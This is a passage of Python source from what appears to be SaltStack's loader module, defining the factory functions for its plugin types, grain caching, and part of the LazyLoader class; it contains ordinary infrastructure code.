for suffix in importlib.machinery.EXTENSION_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_EXTENSION))
for suffix in importlib.machinery.SOURCE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_SOURCE))
for suffix in importlib.machinery.BYTECODE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_COMPILED))
MODULE_KIND_MAP = {
MODULE_KIND_SOURCE: importlib.machinery.SourceFileLoader,
MODULE_KIND_COMPILED: importlib.machinery.SourcelessFileLoader,
MODULE_KIND_EXTENSION: importlib.machinery.ExtensionFileLoader,
}
# pylint: enable=no-member
PY3_PRE_EXT = re.compile(r"\.cpython-{}{}(\.opt-[1-9])?".format(*sys.version_info[:2]))
# Because the cloud drivers do `from salt.cloud.libcloudfuncs import *`,
# which simplifies code readability, some unsupported functions end up in
# the driver's module scope.
# We list the unsupported functions here; they will be removed from the loaded modules.
# TODO: remove the need for this cross-module code. Maybe use NotImplemented
LIBCLOUD_FUNCS_NOT_SUPPORTED = (
"parallels.avail_sizes",
"parallels.avail_locations",
"proxmox.avail_sizes",
)
# Will be set to pyximport module at runtime if cython is enabled in config.
pyximport = None
def static_loader(
opts,
ext_type,
tag,
pack=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
filter_name=None,
):
funcs = LazyLoader(
_module_dirs(
opts, ext_type, tag, int_type, ext_dirs, ext_type_dirs, base_path,
),
opts,
tag=tag,
pack=pack,
)
ret = {}
funcs._load_all()
if filter_name:
funcs = FilterDictWrapper(funcs, filter_name)
for key in funcs:
ret[key] = funcs[key]
return ret
def _format_entrypoint_target(ep):
"""
Makes a string describing the target of an EntryPoint object.
Based heavily on EntryPoint.__str__().
"""
s = ep.module_name
if ep.attrs:
s += ":" + ".".join(ep.attrs)
return s
def _module_dirs(
opts,
ext_type,
tag=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
):
if tag is None:
tag = ext_type
sys_types = os.path.join(base_path or SALT_BASE_PATH, int_type or ext_type)
ext_types = os.path.join(opts["extension_modules"], ext_type)
ext_type_types = []
if ext_dirs:
if ext_type_dirs is None:
ext_type_dirs = "{}_dirs".format(tag)
if ext_type_dirs in opts:
ext_type_types.extend(opts[ext_type_dirs])
if HAS_PKG_RESOURCES and ext_type_dirs:
for entry_point in pkg_resources.iter_entry_points(
"salt.loader", ext_type_dirs
):
try:
loaded_entry_point = entry_point.load()
for path in loaded_entry_point():
ext_type_types.append(path)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Error getting module directories from %s: %s",
_format_entrypoint_target(entry_point),
exc,
)
log.debug(
"Full backtrace for module directories error", exc_info=True
)
cli_module_dirs = []
# The dirs can be any module dir, or an in-tree _{ext_type} dir
for _dir in opts.get("module_dirs", []):
# Prepend to the list to match cli argument ordering
maybe_dir = os.path.join(_dir, ext_type)
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
continue
maybe_dir = os.path.join(_dir, "_{}".format(ext_type))
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
return cli_module_dirs + ext_type_types + [ext_types, sys_types]
def minion_mods(
opts,
context=None,
utils=None,
whitelist=None,
initial_load=False,
loaded_base_name=None,
notify=False,
static_modules=None,
proxy=None,
):
"""
Load execution modules
Returns a dictionary of execution modules appropriate for the current
system by evaluating the __virtual__() function in each module.
:param dict opts: The Salt options dictionary
:param dict context: A Salt context that should be made present inside
generated modules in __context__
:param dict utils: Utility functions which should be made available to
Salt modules in __utils__. See `utils_dirs` in
salt.config for additional information about
configuration.
:param list whitelist: A list of modules which should be whitelisted.
:param bool initial_load: Deprecated flag! Unused.
:param str loaded_base_name: A string marker for the loaded base name.
:param bool notify: Flag indicating that an event should be fired upon
completion of module loading.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
__opts__['grains'] = __grains__
__utils__ = salt.loader.utils(__opts__)
__salt__ = salt.loader.minion_mods(__opts__, utils=__utils__)
__salt__['test.ping']()
"""
# TODO Publish documentation for module whitelisting
if not whitelist:
whitelist = opts.get("whitelist_modules", None)
ret = LazyLoader(
_module_dirs(opts, "modules", "module"),
opts,
tag="module",
pack={"__context__": context, "__utils__": utils, "__proxy__": proxy},
whitelist=whitelist,
loaded_base_name=loaded_base_name,
static_modules=static_modules,
extra_module_dirs=utils.module_dirs if utils else None,
pack_self="__salt__",
)
# Load any provider overrides from the configuration file providers option
# Note: Providers can be pkg, service, user or group - not to be confused
# with cloud providers.
providers = opts.get("providers", False)
if providers and isinstance(providers, dict):
for mod in providers:
# sometimes the providers option is not used to override modules but
# for other configuration
try:
funcs = raw_mod(opts, providers[mod], ret)
except TypeError:
break
else:
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
ret[f_key] = funcs[func]
if notify:
with salt.utils.event.get_event("minion", opts=opts, listen=False) as evt:
evt.fire_event(
{"complete": True}, tag=salt.defaults.events.MINION_MOD_REFRESH_COMPLETE
)
return ret
def raw_mod(opts, name, functions, mod="modules"):
"""
Returns a single module loaded raw and bypassing the __virtual__ function
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
testmod = salt.loader.raw_mod(__opts__, 'test', None)
testmod['test.ping']()
"""
loader = LazyLoader(
_module_dirs(opts, mod, "module"),
opts,
tag="rawmodule",
virtual_enable=False,
pack={"__salt__": functions},
)
# if we don't have the module, return an empty dict
if name not in loader.file_mapping:
return {}
loader._load_module(name) # load a single module (the one passed in)
return dict(loader._dict) # return a copy of *just* the funcs for `name`
def metaproxy(opts, loaded_base_name=None):
"""
Return functions used in the meta proxy
"""
return LazyLoader(
_module_dirs(opts, "metaproxy"),
opts,
tag="metaproxy",
loaded_base_name=loaded_base_name,
)
def matchers(opts):
"""
Return the matcher services plugins
"""
return LazyLoader(_module_dirs(opts, "matchers"), opts, tag="matchers")
def engines(opts, functions, runners, utils, proxy=None):
"""
Return the master services plugins
"""
pack = {
"__salt__": functions,
"__runners__": runners,
"__proxy__": proxy,
"__utils__": utils,
}
return LazyLoader(
_module_dirs(opts, "engines"),
opts,
tag="engines",
pack=pack,
extra_module_dirs=utils.module_dirs if utils else None,
)
def proxy(
opts,
functions=None,
returners=None,
whitelist=None,
utils=None,
context=None,
pack_self="__proxy__",
):
"""
Returns the proxy module for this salt-proxy-minion
"""
return LazyLoader(
_module_dirs(opts, "proxy"),
opts,
tag="proxy",
pack={
"__salt__": functions,
"__ret__": returners,
"__utils__": utils,
"__context__": context,
},
extra_module_dirs=utils.module_dirs if utils else None,
pack_self=pack_self,
)
def returners(opts, functions, whitelist=None, context=None, proxy=None):
"""
Returns the returner modules
"""
return LazyLoader(
_module_dirs(opts, "returners", "returner"),
opts,
tag="returner",
whitelist=whitelist,
pack={"__salt__": functions, "__context__": context, "__proxy__": proxy or {}},
)
def utils(opts, whitelist=None, context=None, proxy=proxy, pack_self=None):
"""
Returns the utility modules
"""
return LazyLoader(
_module_dirs(opts, "utils", ext_type_dirs="utils_dirs"),
opts,
tag="utils",
whitelist=whitelist,
pack={"__context__": context, "__proxy__": proxy or {}},
pack_self=pack_self,
)
def pillars(opts, functions, context=None):
"""
Returns the pillars modules
"""
_utils = utils(opts)
ret = LazyLoader(
_module_dirs(opts, "pillar"),
opts,
tag="pillar",
pack={"__salt__": functions, "__context__": context, "__utils__": _utils},
extra_module_dirs=_utils.module_dirs,
pack_self="__ext_pillar__",
)
return FilterDictWrapper(ret, ".ext_pillar")
def tops(opts):
"""
Returns the tops modules
"""
if "master_tops" not in opts:
return {}
whitelist = list(opts["master_tops"].keys())
ret = LazyLoader(
_module_dirs(opts, "tops", "top"), opts, tag="top", whitelist=whitelist,
)
return FilterDictWrapper(ret, ".top")
def wheels(opts, whitelist=None, context=None):
"""
Returns the wheels modules
"""
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "wheel"),
opts,
tag="wheel",
whitelist=whitelist,
pack={"__context__": context},
)
def outputters(opts):
"""
Returns the outputters modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only outputters present in the keyspace
"""
ret = LazyLoader(
_module_dirs(opts, "output", ext_type_dirs="outputter_dirs"),
opts,
tag="output",
)
wrapped_ret = FilterDictWrapper(ret, ".output")
# TODO: this name seems terrible... __salt__ should always be execution mods
ret.pack["__salt__"] = wrapped_ret
return wrapped_ret
def serializers(opts):
"""
Returns the serializers modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only serializers present in the keyspace
"""
return LazyLoader(_module_dirs(opts, "serializers"), opts, tag="serializers",)
def eauth_tokens(opts):
"""
Returns the tokens modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only token backends present in the keyspace
"""
return LazyLoader(_module_dirs(opts, "tokens"), opts, tag="tokens",)
def auth(opts, whitelist=None):
"""
Returns the auth modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader
"""
return LazyLoader(
_module_dirs(opts, "auth"),
opts,
tag="auth",
whitelist=whitelist,
pack={"__salt__": minion_mods(opts)},
)
def fileserver(opts, backends):
"""
Returns the file server modules
"""
_utils = utils(opts)
if backends is not None:
if not isinstance(backends, list):
backends = [backends]
# If backend is a VCS, add both the '-fs' and non '-fs' versions to the list.
# Use a set to keep them unique
backend_set = set()
vcs_re = re.compile("^(git|svn|hg)(?:fs)?$")
for backend in backends:
match = vcs_re.match(backend)
if match:
backend_set.add(match.group(1))
backend_set.add(match.group(1) + "fs")
else:
backend_set.add(backend)
backends = list(backend_set)
return LazyLoader(
_module_dirs(opts, "fileserver"),
opts,
tag="fileserver",
whitelist=backends,
pack={"__utils__": _utils},
extra_module_dirs=_utils.module_dirs,
)
def roster(opts, runner=None, utils=None, whitelist=None):
"""
Returns the roster modules
"""
return LazyLoader(
_module_dirs(opts, "roster"),
opts,
tag="roster",
whitelist=whitelist,
pack={"__runner__": runner, "__utils__": utils},
extra_module_dirs=utils.module_dirs if utils else None,
)
def thorium(opts, functions, runners):
"""
Load the thorium runtime modules
"""
pack = {"__salt__": functions, "__runner__": runners, "__context__": {}}
ret = LazyLoader(_module_dirs(opts, "thorium"), opts, tag="thorium", pack=pack)
ret.pack["__thorium__"] = ret
return ret
def states(
opts, functions, utils, serializers, whitelist=None, proxy=None, context=None
):
"""
Returns the state modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
statemods = salt.loader.states(__opts__, None, None)
"""
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "states"),
opts,
tag="states",
pack={
"__salt__": functions,
"__proxy__": proxy or {},
"__utils__": utils,
"__serializers__": serializers,
"__context__": context,
},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
pack_self="__states__",
)
def beacons(opts, functions, context=None, proxy=None):
"""
Load the beacon modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
"""
return LazyLoader(
_module_dirs(opts, "beacons"),
opts,
tag="beacons",
pack={"__context__": context, "__salt__": functions, "__proxy__": proxy or {}},
virtual_funcs=[],
)
def log_handlers(opts):
"""
Returns the custom logging handler modules
:param dict opts: The Salt options dictionary
"""
ret = LazyLoader(
_module_dirs(
opts,
"log_handlers",
int_type="handlers",
base_path=os.path.join(SALT_BASE_PATH, "log"),
),
opts,
tag="log_handlers",
)
return FilterDictWrapper(ret, ".setup_handlers")
def ssh_wrapper(opts, functions=None, context=None):
"""
Returns the salt-ssh wrapper modules
"""
return LazyLoader(
_module_dirs(
opts,
"wrapper",
base_path=os.path.join(SALT_BASE_PATH, os.path.join("client", "ssh")),
),
opts,
tag="wrapper",
pack={
"__salt__": functions,
# "__grains__": opts.get("grains", {}),
# "__pillar__": opts.get("pillar", {}),
"__context__": context,
},
)
def render(opts, functions, states=None, proxy=None, context=None):
"""
Returns the render modules
"""
if context is None:
context = {}
pack = {
"__salt__": functions,
"__grains__": opts.get("grains", {}),
"__context__": context,
}
if states:
pack["__states__"] = states
if proxy is None:
proxy = {}
pack["__proxy__"] = proxy
ret = LazyLoader(
_module_dirs(opts, "renderers", "render", ext_type_dirs="render_dirs",),
opts,
tag="render",
pack=pack,
)
rend = FilterDictWrapper(ret, ".render")
if not check_render_pipe_str(
opts["renderer"], rend, opts["renderer_blacklist"], opts["renderer_whitelist"]
):
err = (
"The renderer {} is unavailable, this error is often because "
"the needed software is unavailable".format(opts["renderer"])
)
log.critical(err)
raise LoaderError(err)
return rend
def grain_funcs(opts, proxy=None, context=None):
"""
Returns the grain functions
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
grainfuncs = salt.loader.grain_funcs(__opts__)
"""
_utils = utils(opts, proxy=proxy)
pack = {"__utils__": utils(opts, proxy=proxy), "__context__": context}
ret = LazyLoader(
_module_dirs(opts, "grains", "grain", ext_type_dirs="grains_dirs",),
opts,
tag="grains",
extra_module_dirs=_utils.module_dirs,
pack=pack,
)
ret.pack["__utils__"] = _utils
return ret
def _format_cached_grains(cached_grains):
"""
Returns cached grains with fixed types, like tuples.
"""
if cached_grains.get("osrelease_info"):
osrelease_info = cached_grains["osrelease_info"]
if isinstance(osrelease_info, list):
cached_grains["osrelease_info"] = tuple(osrelease_info)
return cached_grains
def _load_cached_grains(opts, cfn):
"""
Returns the grains cached in cfn, or None if the cache is too old or is
corrupted.
"""
if not os.path.isfile(cfn):
log.debug("Grains cache file does not exist.")
return None
grains_cache_age = int(time.time() - os.path.getmtime(cfn))
if grains_cache_age > opts.get("grains_cache_expiration", 300):
log.debug(
"Grains cache last modified %s seconds ago and cache "
"expiration is set to %s. Grains cache expired. "
"Refreshing.",
grains_cache_age,
opts.get("grains_cache_expiration", 300),
)
return None
if opts.get("refresh_grains_cache", False):
log.debug("refresh_grains_cache requested, Refreshing.")
return None
log.debug("Retrieving grains from cache")
try:
serial = salt.payload.Serial(opts)
with salt.utils.files.fopen(cfn, "rb") as fp_:
cached_grains = salt.utils.data.decode(
serial.load(fp_), preserve_tuples=True
)
if not cached_grains:
log.debug("Cached grains are empty, cache might be corrupted. Refreshing.")
return None
return _format_cached_grains(cached_grains)
except OSError:
return None
def grains(opts, force_refresh=False, proxy=None, context=None):
"""
Return the functions for the dynamic grains and the values for the static
grains.
Since grains are computed early in the startup process, grains functions
do not have __salt__ or __proxy__ available. At proxy-minion startup,
this function is called with the proxymodule LazyLoader object so grains
functions can communicate with their controlled device.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
print __grains__['id']
"""
# Need to re-import salt.config, somehow it got lost when a minion is starting
import salt.config
# if we have no grains, lets try loading from disk (TODO: move to decorator?)
cfn = os.path.join(opts["cachedir"], "grains.cache.p")
if not force_refresh and opts.get("grains_cache", False):
cached_grains = _load_cached_grains(opts, cfn)
if cached_grains:
return cached_grains
else:
log.debug("Grains refresh requested. Refreshing grains.")
if opts.get("skip_grains", False):
return {}
grains_deep_merge = opts.get("grains_deep_merge", False) is True
if "conf_file" in opts:
pre_opts = {}
pre_opts.update(
salt.config.load_config(
opts["conf_file"],
"SALT_MINION_CONFIG",
salt.config.DEFAULT_MINION_OPTS["conf_file"],
)
)
default_include = pre_opts.get("default_include", opts["default_include"])
include = pre_opts.get("include", [])
pre_opts.update(
salt.config.include_config(
default_include, opts["conf_file"], verbose=False
)
)
pre_opts.update(
salt.config.include_config(include, opts["conf_file"], verbose=True)
)
if "grains" in pre_opts:
opts["grains"] = pre_opts["grains"]
else:
opts["grains"] = {}
else:
opts["grains"] = {}
grains_data = {}
blist = opts.get("grains_blacklist", [])
funcs = grain_funcs(opts, proxy=proxy, context=context or {})
if force_refresh: # if we refresh, lets reload grain modules
funcs.clear()
# Run core grains
for key in funcs:
if not key.startswith("core."):
continue
log.trace("Loading %s grain", key)
ret = funcs[key]()
if not isinstance(ret, dict):
continue
if blist:
for key in list(ret):
for block in blist:
if salt.utils.stringutils.expr_match(key, block):
del ret[key]
log.trace("Filtering %s grain", key)
if not ret:
continue
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
# Run the rest of the grains
for key in funcs:
if key.startswith("core.") or key == "_errors":
continue
try:
# Grains are loaded too early to take advantage of the injected
# __proxy__ variable. Pass an instance of that LazyLoader
# here instead to grains functions if the grains functions take
# one parameter. Then the grains can have access to the
# proxymodule for retrieving information from the connected
# device.
log.trace("Loading %s grain", key)
parameters = salt.utils.args.get_function_argspec(funcs[key]).args
kwargs = {}
if "proxy" in parameters:
kwargs["proxy"] = proxy
if "grains" in parameters:
kwargs["grains"] = grains_data
ret = funcs[key](**kwargs)
except Exception: # pylint: disable=broad-except
if salt.utils.platform.is_proxy():
log.info(
"The following CRITICAL message may not be an error; the proxy may not be completely established yet."
)
log.critical(
"Failed to load grains defined in grain file %s in "
"function %s, error:\n",
key,
funcs[key],
exc_info=True,
)
continue
if not isinstance(ret, dict):
continue
if blist:
for key in list(ret):
for block in blist:
if salt.utils.stringutils.expr_match(key, block):
del ret[key]
log.trace("Filtering %s grain", key)
if not ret:
continue
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
if opts.get("proxy_merge_grains_in_module", True) and proxy:
try:
proxytype = proxy.opts["proxy"]["proxytype"]
if proxytype + ".grains" in proxy:
if (
proxytype + ".initialized" in proxy
and proxy[proxytype + ".initialized"]()
):
try:
proxytype = proxy.opts["proxy"]["proxytype"]
ret = proxy[proxytype + ".grains"]()
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
except Exception: # pylint: disable=broad-except
log.critical(
"Failed to run proxy's grains function!", exc_info=True
)
except KeyError:
pass
grains_data.update(opts["grains"])
# Write cache if enabled
if opts.get("grains_cache", False):
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Late import
import salt.modules.cmdmod
# Make sure cache file isn't read-only
salt.modules.cmdmod._run_quiet('attrib -R "{}"'.format(cfn))
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
serial = salt.payload.Serial(opts)
serial.dump(grains_data, fp_)
except TypeError as e:
log.error("Failed to serialize grains cache: %s", e)
raise # re-throw for cleanup
except Exception as e: # pylint: disable=broad-except
log.error("Unable to write to grains cache file %s: %s", cfn, e)
# Based on the original exception, the file may or may not have been
# created. If it was, we will remove it now, as the exception means
# the serialized data is not to be trusted, no matter what the
# exception is.
if os.path.isfile(cfn):
os.unlink(cfn)
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, opts["grains"])
else:
grains_data.update(opts["grains"])
return salt.utils.data.decode(grains_data, preserve_tuples=True)
# TODO: get rid of? Does anyone use this? You should use raw() instead
def call(fun, **kwargs):
"""
Directly call a function inside a loader directory
"""
args = kwargs.get("args", [])
dirs = kwargs.get("dirs", [])
funcs = LazyLoader(
[os.path.join(SALT_BASE_PATH, "modules")] + dirs,
None,
tag="modules",
virtual_enable=False,
)
return funcs[fun](*args)
def runner(opts, utils=None, context=None, whitelist=None):
"""
Returns the runner modules
"""
if utils is None:
utils = {}
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "runners", "runner", ext_type_dirs="runner_dirs"),
opts,
tag="runners",
pack={"__utils__": utils, "__context__": context},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
# TODO: change from __salt__ to something else, we overload __salt__ too much
pack_self="__salt__",
)
def queues(opts):
"""
Returns the queue modules
"""
return LazyLoader(
_module_dirs(opts, "queues", "queue", ext_type_dirs="queue_dirs"),
opts,
tag="queues",
)
def sdb(opts, functions=None, whitelist=None, utils=None):
"""
Make a very small database call
"""
if utils is None:
utils = {}
return LazyLoader(
_module_dirs(opts, "sdb"),
opts,
tag="sdb",
pack={
"__sdb__": functions,
"__utils__": utils,
"__salt__": minion_mods(opts, utils=utils),
},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
)
def pkgdb(opts):
"""
Return modules for SPM's package database
.. versionadded:: 2015.8.0
"""
return LazyLoader(
_module_dirs(opts, "pkgdb", base_path=os.path.join(SALT_BASE_PATH, "spm")),
opts,
tag="pkgdb",
)
def pkgfiles(opts):
"""
Return modules for SPM's file handling
.. versionadded:: 2015.8.0
"""
return LazyLoader(
_module_dirs(opts, "pkgfiles", base_path=os.path.join(SALT_BASE_PATH, "spm")),
opts,
tag="pkgfiles",
)
def clouds(opts):
"""
Return the cloud functions
"""
_utils = salt.loader.utils(opts)
# Let's bring __active_provider_name__, defaulting to None, to all cloud
# drivers. This will get temporarily updated/overridden with a context
# manager when needed.
functions = LazyLoader(
_module_dirs(
opts,
"clouds",
"cloud",
base_path=os.path.join(SALT_BASE_PATH, "cloud"),
int_type="clouds",
),
opts,
tag="clouds",
pack={"__utils__": _utils, "__active_provider_name__": None},
extra_module_dirs=_utils.module_dirs,
)
for funcname in LIBCLOUD_FUNCS_NOT_SUPPORTED:
log.trace(
"'%s' has been marked as not supported. Removing from the "
"list of supported cloud functions",
funcname,
)
functions.pop(funcname, None)
return functions
def netapi(opts):
"""
Return the network api functions
"""
return LazyLoader(_module_dirs(opts, "netapi"), opts, tag="netapi",)
def executors(opts, functions=None, context=None, proxy=None):
"""
Returns the executor modules
"""
if proxy is None:
proxy = {}
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "executors", "executor"),
opts,
tag="executor",
pack={"__salt__": functions, "__context__": context, "__proxy__": proxy},
pack_self="__executors__",
)
def cache(opts, serial):
"""
Returns the cache modules
"""
return LazyLoader(
_module_dirs(opts, "cache", "cache"),
opts,
tag="cache",
pack={"__context__": {"serial": serial}},
)
def _generate_module(name):
if name in sys.modules:
return
code = "'''Salt loaded {} parent module'''".format(name.split(".")[-1])
# ModuleType can't accept a unicode type on PY2
module = types.ModuleType(str(name)) # future lint: disable=blacklisted-function
exec(code, module.__dict__)
sys.modules[name] = module
def _mod_type(module_path):
if module_path.startswith(SALT_BASE_PATH):
return "int"
return "ext"
# TODO: move somewhere else?
class FilterDictWrapper(MutableMapping):
"""
Create a dict which wraps another dict with a specific key suffix on get
This is to replace "filter_load"
"""
def __init__(self, d, suffix):
self._dict = d
self.suffix = suffix
def __setitem__(self, key, val):
self._dict[key] = val
def __delitem__(self, key):
del self._dict[key]
def __getitem__(self, key):
return self._dict[key + self.suffix]
def __len__(self):
return len(self._dict)
def __iter__(self):
for key in self._dict:
if key.endswith(self.suffix):
yield key.replace(self.suffix, "")
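# Illustrative sketch of the FilterDictWrapper contract described above: reads
# append the suffix to the key, and iteration strips it again. The toy dict
# below is an assumption used only for demonstration.
#
#     wrapped = FilterDictWrapper({"mysql.ext_pillar": lambda: None}, ".ext_pillar")
#     wrapped["mysql"]    # looks up "mysql.ext_pillar" in the wrapped dict
#     list(wrapped)       # -> ["mysql"]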
class LoadedFunc:
"""
The functions loaded by LazyLoader instances using subscript notation
'a[k]' will be wrapped with LoadedFunc.
- Makes sure functions are called with the correct loader's context.
- Provides access to a wrapped func's __globals__ attribute
:param func callable: The callable to wrap.
:param dict loader: The loader to use in the context when the wrapped callable is called.
"""
def __init__(self, func, loader):
self.func = func
self.loader = loader
functools.update_wrapper(self, func)
def __getattr__(self, name):
return getattr(self.func, name)
def __call__(self, *args, **kwargs):
if self.loader.inject_globals:
run_func = global_injector_decorator(self.loader.inject_globals)(self.func)
else:
run_func = self.func
return self.loader.run(run_func, *args, **kwargs)
class LoadedMod:
def __init__(self, mod, loader):
"""
Wrap a loaded module so that attribute access is routed through the
loader.
"""
self.mod = mod
self.loader = loader
def __getattr__(self, name):
"""
Return the requested attribute of the wrapped module, wrapping any
function in a LoadedFunc so it runs in the loader's context.
"""
attr = getattr(self.mod, name)
if inspect.isfunction(attr) or inspect.ismethod(attr):
return LoadedFunc(attr, self.loader)
return attr
class LazyLoader(salt.utils.lazy.LazyDict):
"""
A pseudo-dictionary which has a set of keys which are the
name of the module and function, delimited by a dot. When
the value of the key is accessed, the function is then loaded
from disk and into memory.
.. note::
Iterating over keys will cause all modules to be loaded.
:param list module_dirs: A list of directories on disk to search for modules
:param dict opts: The salt options dictionary.
:param str tag: The tag for the type of module to load
:param func mod_type_check: A function which can be used to verify files
:param dict pack: A dictionary of function to be packed into modules as they are loaded
:param list whitelist: A list of modules to whitelist
:param bool virtual_enable: Whether or not to respect the __virtual__ function when loading modules.
:param list virtual_funcs: The names of additional functions in the module to call to verify its functionality.
If any of them does not return True, the module will not load.
:param list extra_module_dirs: A list of directories that will be able to import from
:param str pack_self: Pack this loader into the loaded modules under a variable with this name
:returns: A LazyLoader object which functions as a dictionary. Keys are 'module.function' and values
are function references themselves which are loaded on-demand.
# TODO:
- move modules_max_memory into here
- singletons (per tag)
"""
mod_dict_class = salt.utils.odict.OrderedDict
def __init__(
self,
module_dirs,
opts=None,
tag="module",
loaded_base_name=None,
mod_type_check=None,
pack=None,
whitelist=None,
virtual_enable=True,
static_modules=None,
proxy=None,
virtual_funcs=None,
extra_module_dirs=None,
pack_self=None,
): # pylint: disable=W0231
"""
In pack, if any of the values are None they will be replaced with an
empty context-specific dict
"""
self.parent_loader = None
self.inject_globals = {}
self.pack = {} if pack is None else pack
for i in self.pack:
if isinstance(self.pack[i], salt.loader_context.NamedLoaderContext):
self.pack[i] = self.pack[i].value()
if opts is None:
opts = {}
threadsafety = not opts.get("multiprocessing")
self.context_dict = salt.utils.context.ContextDict(threadsafe=threadsafety)
self.opts = self.__prep_mod_opts(opts)
self.pack_self = pack_self
self.module_dirs = module_dirs
self.tag = tag
self._gc_finalizer = None
if loaded_base_name and loaded_base_name != LOADED_BASE_NAME:
self.loaded_base_name = loaded_base_name
else:
self.loaded_base_name = LOADED_BASE_NAME
self.mod_type_check = mod_type_check or _mod_type
if "__context__" not in self.pack:
self.pack["__context__"] = None
for k, v in self.pack.items():
if v is None: # if the value of a pack is None, lets make an empty dict
self.context_dict.setdefault(k, {})
self.pack[k] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, k
)
self.whitelist = whitelist
self.virtual_enable = virtual_enable
self.initial_load = True
# names of modules that we don't have (errors, __virtual__, etc.)
self.missing_modules = {} # mapping of name -> error
self.loaded_modules = {} # mapping of module_name -> dict_of_functions
self.loaded_files = set() # TODO: just remove them from file_mapping?
self.static_modules = static_modules if static_modules else []
if virtual_funcs is None:
virtual_funcs = []
self.virtual_funcs = virtual_funcs
self.extra_module_dirs = extra_module_dirs if extra_module_dirs else []
self._clean_module_dirs = []
self.disabled = set(
self.opts.get(
"disable_{}{}".format(self.tag, "" if self.tag[-1] == "s" else "s"), [],
)
)
# A map of suffix to description for imp
self.suffix_map = {}
# A list to determine precedence of extensions
# Prefer packages (directories) over modules (single files)!
self.suffix_order = [""]
for (suffix, mode, kind) in SUFFIXES:
self.suffix_map[suffix] = (suffix, mode, kind)
self.suffix_order.append(suffix)
self._lock = threading.RLock()
with self._lock:
self._refresh_file_mapping()
super().__init__() # late init the lazy loader
# create all of the import namespaces
_generate_module("{}.int".format(self.loaded_base_name))
_generate_module("{}.int.{}".format(self.loaded_base_name, tag))
_generate_module("{}.ext".format(self.loaded_base_name))
_generate_module("{}.ext.{}".format(self.loaded_base_name, tag))
def clean_modules(self):
"""
Clean modules
"""
for name in list(sys.modules):
if name.startswith(self.loaded_base_name):
del sys.modules[name]
def __getitem__(self, item):
"""
Override the __getitem__ in order to decorate the returned function if we need
to last-minute inject globals
"""
func = super().__getitem__(item)
return LoadedFunc(func, self)
def __getattr__(self, mod_name):
"""
Allow for "direct" attribute access-- this allows jinja templates to
access things like `salt.test.ping()`
"""
if mod_name in ("__getstate__", "__setstate__"):
return object.__getattribute__(self, mod_name)
# if we have an attribute named that, lets return it.
try:
return object.__getattr__(self, mod_name) # pylint: disable=no-member
except AttributeError:
pass
# otherwise we assume it's jinja template access
if mod_name not in self.loaded_modules and not self.loaded:
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and mod_name in self.loaded_modules:
break
if mod_name in self.loaded_modules:
return LoadedMod(self.loaded_modules[mod_name], self)
else:
raise AttributeError(mod_name)
def missing_fun_string(self, function_name):
"""
Return the error string for a missing function.
This can range from "not available" to "__virtual__ returned False"
"""
mod_name = function_name.split(".")[0]
if mod_name in self.loaded_modules:
return "'{}' is not available.".format(function_name)
else:
try:
reason = self.missing_modules[mod_name]
except KeyError:
return "'{}' is not available.".format(function_name)
else:
if reason is not None:
return "'{}' __virtual__ returned False: {}".format(
mod_name, reason
)
else:
return "'{}' __virtual__ returned False".format(mod_name)
def _refresh_file_mapping(self):
"""
refresh the mapping of the FS on disk
"""
# map of suffix to description for imp
if (
self.opts.get("cython_enable", True) is True
and ".pyx" not in self.suffix_map
):
try:
global pyximport
pyximport = __import__("pyximport") # pylint: disable=import-error
pyximport.install()
# add to suffix_map so file_mapping will pick it up
self.suffix_map[".pyx"] = tuple()
if ".pyx" not in self.suffix_order:
self.suffix_order.append(".pyx")
except ImportError:
log.info(
"Cython is enabled in the options but not present "
"in the system path. Skipping Cython modules."
)
# Allow for zipimport of modules
if (
self.opts.get("enable_zip_modules", True) is True
and ".zip" not in self.suffix_map
):
self.suffix_map[".zip"] = tuple()
if ".zip" not in self.suffix_order:
self.suffix_order.append(".zip")
# allow for module dirs
self.suffix_map[""] = ("", "", MODULE_KIND_PKG_DIRECTORY)
# create mapping of filename (without suffix) to (path, suffix)
# The files are added in order of priority, so order *must* be retained.
self.file_mapping = salt.utils.odict.OrderedDict()
